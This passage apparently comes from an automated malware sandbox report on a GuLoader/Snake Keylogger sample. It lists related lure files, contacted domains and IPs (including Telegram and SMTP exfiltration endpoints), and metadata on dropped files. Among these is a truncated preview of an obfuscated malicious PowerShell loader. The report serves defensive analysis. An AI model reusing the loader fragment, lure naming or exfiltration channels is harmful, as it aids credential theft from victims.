                                                                                          193.122.130.0Swift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          001_215_EA2047939_202410210815.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          MT103-539 PAYMENT (1).docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          PaymentXConfirmationXcopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          RFQ 1307.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          routcrying.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          rcota____oRFQNO-N__merodopedido106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          Justificante de pago.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          reallyfreegeoip.orgSecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          Swift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          FACTURA-ALBARANES.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          New Purchase_Order_110511.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          7vbu8ZW8lFI8mn5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          z547GEViTFyfCZdLZP.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          TicariXHesapXXzetiniz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          REVISED PROFORMA INVOICE STVC007934196.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          MT103-539 PAYMENT (1).docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          smtp.ionos.esSnvlerier.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 213.165.67.118
                                                                                          Snvlerier.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 213.165.67.102
                                                                                          Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 213.165.67.118
                                                                                          r8x1WvSkbWSUjXh6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 213.165.67.102
                                                                                          ZcH50SI4q45Dtpf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 213.165.67.118
                                                                                          LisectAVT_2403002A_257.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 213.165.67.102
                                                                                          USyhqVZT33vX26Y.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 213.165.67.118
                                                                                          60yQVZ67vj.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                          • 213.165.67.102
                                                                                          JUSTIFICANTE PAGO FACTURA.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                          • 213.165.67.118
                                                                                          Nowe zam#U00f3wienie nr 201030019.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 213.165.67.102
                                                                                          checkip.dyndns.comSecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          Swift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          FACTURA-ALBARANES.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          New Purchase_Order_110511.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          7vbu8ZW8lFI8mn5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          001_215_EA2047939_202410210815.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          z547GEViTFyfCZdLZP.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                          • 132.226.8.169
                                                                                          SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          TicariXHesapXXzetiniz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 132.226.8.169
                                                                                          REVISED PROFORMA INVOICE STVC007934196.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          api.telegram.orgSecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Swift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          FACTURA-ALBARANES.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          New Purchase_Order_110511.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          7vbu8ZW8lFI8mn5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          TicariXHesapXXzetiniz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          REVISED PROFORMA INVOICE STVC007934196.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          MT103-539 PAYMENT (1).docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          TELEGRAMRUSecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Swift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          FACTURA-ALBARANES.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          New Purchase_Order_110511.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          7vbu8ZW8lFI8mn5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          TicariXHesapXXzetiniz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          REVISED PROFORMA INVOICE STVC007934196.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          MT103-539 PAYMENT (1).docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          CLOUDFLARENETUSBA4M310209H14956.xlsGet hashmaliciousRemcosBrowse
                                                                                          • 188.114.96.3
                                                                                          https://email.mail.customfeedback.com/c/eJyUkD-P1TAQxD9N3J2VXXuduHDxDpEGiQpE7T_rS_QS-8kxF45Pjw5EQ0c7oxnNb6I_Hn57KZ_4zSlEg2SizkA0WtbGjsF6M4G2SGHChMFrYhFr6T729wz6NOfRayKLZCipOVACmgA4mEwhEHnFbEVykCcMs2AHE1oCrQBF3trZP_uD3a0kbmctItd2-Za-cVhrvX9tu1t7f5yDug24DLj0WvdThra9rH2v0e8y1mPA5eT69NsbcPHp2MqAy1-6d-36U_j0imJ1SUcVQFkMMSitNMCkxpR4jhBtVFpsDkfUMCIAqlmhBPnxtujnDzdSSPoZLA16PPy2y_j97PXIzCn4eH9fI-7_88y_gHkrvkTeSq7yJyh5cZCxNpbXVlK9Tlm4D7iIw01GkxoBxKPVH29f6p2Lm2adApjs7az0FDRE8Hkeo9ETc4qzNqPxRFk0F9e2nb0-Vm7S77svgx7bo1XZOa7i1eGvAAAA__9cb6caGet hashmaliciousUnknownBrowse
                                                                                          • 104.16.20.118
                                                                                          BL Packing List & Invoice.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 188.114.96.3
                                                                                          ProformaInvoice.xlsGet hashmaliciousPureLog StealerBrowse
                                                                                          • 188.114.96.3
                                                                                          SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          Swift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          https://link.edgepilot.com/s/a87a8c67/R8ziiM5L9EqrFhZqAjyPWg?u=https://debbydollar.com/Get hashmaliciousUnknownBrowse
                                                                                          • 104.18.11.207
                                                                                          FACTURA-ALBARANES.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          FZCO - PO#12345.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 104.26.13.205
                                                                                          New Purchase_Order_110511.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          ONEANDONE-ASBrauerstrasse48DEInvoice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                          • 217.160.0.158
                                                                                          la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                          • 212.227.7.42
                                                                                          Request for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                          • 217.160.0.93
                                                                                          la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                          • 212.227.138.124
                                                                                          yakuza.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                          • 74.208.123.157
                                                                                          la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                          • 217.160.111.108
                                                                                          Ageeconstruction -_(BENEFIT INSTRUCTIONS)_.docxGet hashmaliciousMamba2FABrowse
                                                                                          • 217.160.0.215
                                                                                          Ageeconstruction -_(BENEFIT INSTRUCTIONS)_.docxGet hashmaliciousMamba2FABrowse
                                                                                          • 217.160.0.215
                                                                                          EMnyl2klUV.elfGet hashmaliciousMiraiBrowse
                                                                                          • 217.160.45.92
                                                                                          4ui8luUSNp.exeGet hashmaliciousCoinhive, XmrigBrowse
                                                                                          • 212.227.15.41
                                                                                          ORACLE-BMC-31898USSwift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          New Purchase_Order_110511.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          7vbu8ZW8lFI8mn5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          001_215_EA2047939_202410210815.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          REVISED PROFORMA INVOICE STVC007934196.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          MT103-539 PAYMENT (1).docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          PaymentXConfirmationXcopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          SUAlTWPjKQ.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          54328bd36c14bd82ddaa0c04b25ed9adSecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          Swift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          FACTURA-ALBARANES.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          New Purchase_Order_110511.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          7vbu8ZW8lFI8mn5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          z547GEViTFyfCZdLZP.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          TicariXHesapXXzetiniz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          REVISED PROFORMA INVOICE STVC007934196.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          Musterino_94372478_Ekno_21_20241024761_ekstre.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 188.114.97.3
                                                                                          3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Swift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          6 654398.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 149.154.167.220
                                                                                          FACTURA-ALBARANES.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Massageapparater.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 149.154.167.220
                                                                                          FZCO - PO#12345.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 149.154.167.220
                                                                                          New Purchase_Order_110511.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          7vbu8ZW8lFI8mn5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Ref#150689.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 149.154.167.220
                                                                                          MEC20241022001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                          • 149.154.167.220
                                                                                          37f463bf4616ecd445d4a1937da06e196 654398.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          FACTURA-ALBARANES.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          Massageapparater.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          phc.exeGet hashmaliciousUnknownBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          phc.exeGet hashmaliciousUnknownBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          001_215_EA2047939_202410210815.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          Fignen234.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          Fignen234.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          MEC20241022001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          No context
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:modified
                                                                                          Size (bytes):14744
                                                                                          Entropy (8bit):4.992175361088568
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                                          MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                                          SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                                          SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                                          SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Users\user\Desktop\Rundholterne89.exe
                                                                                          File Type:ASCII text, with very long lines (3437), with CRLF, LF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):55452
                                                                                          Entropy (8bit):5.30644161671957
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:L3ZsYDoSFyAkhotYr3XpNhdrWlR7uDZy4k:DiYMSFyVoANpy4k
                                                                                          MD5:0D2CE39822E9236A380F4D1D53550E93
                                                                                          SHA1:8381B0E62708112DBFBED036650BF0667EC4476B
                                                                                          SHA-256:ED34DB2A55A35C90B524D2448353EB73D28DA7D7FF401477165C226FF25DE9AF
                                                                                          SHA-512:F365BB861DB3FC6D29736B3F8C0377BB4F8318FFF94BC96033AE208760082B529B8AEA4CF79DE9EFA3608C79AC91FE57E19F26959831F621BBA8816E1013AFC3
                                                                                          Malicious:true
                                                                                          Preview:$Spales=$Undiluvian;..<#Standpunkts Smpistolers Beatgruppes #>..<#Bytime Stirk Sexfilmene Vermifuges Charquis Sintering #>..<#Djrvheders riksmal Ihjel Kartotekspostens Ligitimizing #>..<#Blennometritis Legalt Angrebsraketter Sabbathvilen #>..<#Margritt Tilsendelse Somnopathy Lderingerne Harmoni Tilsnigelsen #>..<#Dolichosauria Valm Interestless Chartered #>...$Frumps = @'.Lempn.Extra$Bec.rehom,laAftal=T,ckn$ Vi,iVMi.anaG.rkelT nsmgWudgekAmerioUdraan KystgDisc eFrancdVggelmf rsvmGasmeeSpindr.nfors ,norePole hBinyraPseudnCreeddUltralDisseelirkslOmsteiRykkeg BarmeAcros; Ve.e.Footbf Ru buVankenEarthceucattUkuleiBeamio CondnFrem A.pelPsvaneaSomallAvl,dm Gas,eUpc.ubProjelBanelaMuskldparapsSirentGrypha xpegchar,eB ttlt psedsInfor rbdig(Arves$ sculB arledTeet eSkrmpfYnkvro SarcrEkspoeUnfaklLiquegCortigSelvmeAerodt Tick2derat1Under5Lo el,Nosk $ agsiVHer taCackllInklug AplokS oleo orlnVandugDefoae womadPlanem VddemIngereSparar,fnaksSemic)Barba Ke a{Fri.i. rhve.C ose$TeddyARe urg N ber UninaW
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Category:dropped
                                                                                          Size (bytes):891148
                                                                                          Entropy (8bit):7.7193229791674485
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:/75JHVcDo1hTW+VeQ9Ke+alCJmvulW6Nd0vd:jDHVUW/VrKe+m7mwMAd
                                                                                          MD5:A1E239C4D5116E289CE0597A92844EDE
                                                                                          SHA1:4562D452CCC32512291C3165A0B9B3C076B28094
                                                                                          SHA-256:1E507FEBDD48A2BF2429C8011BD5CBC5C7B018207BDAEC87665B8B51FA13D904
                                                                                          SHA-512:500DDCDC2F1E3CA0DA0A43006B99C6E78697433FC0757D25DDFF94190DD2D725799FAF267EFDFACDEF758E9024591368454F14025662CC6A1309BCE7863494D2
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 42%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L....{.W.................`...|.......1.......p....@.......................................@.................................4u....... ..X............................................................................p...............................text...._.......`.................. ..`.rdata..R....p.......d..............@..@.data....T...........x..............@....ndata...0...............................rsrc...X.... .......~..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):26
                                                                                          Entropy (8bit):3.95006375643621
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                          Malicious:true
                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                          Process:C:\Users\user\Desktop\Rundholterne89.exe
                                                                                          File Type:ASCII text, with very long lines (360), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):362
                                                                                          Entropy (8bit):4.295609901239941
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:OV0mI/AA3CU6sDq6ry0bxmAOvFz0/TWEMsesxM7JXZO:OVcAV6yw3Ovx0/q3shK7Js
                                                                                          MD5:A47DE65B255D62E154E75208730B37D2
                                                                                          SHA1:9AD95C489EABDBCD12C02CD312C85D0C73A565F7
                                                                                          SHA-256:1527C27BE377FB2EFDB75E64EF88FEE6B879712DEC1AE6E8CCA4E66188099784
                                                                                          SHA-512:206FB780CA6A6BEA7B1DA2AAD8D1E8C38331AE5A03CC82FC181A6E13234DC4523033AA775A3F15C261FEC74910ECAF622ABAC99444E8DAA8B63EC35379FBE29A
                                                                                          Malicious:false
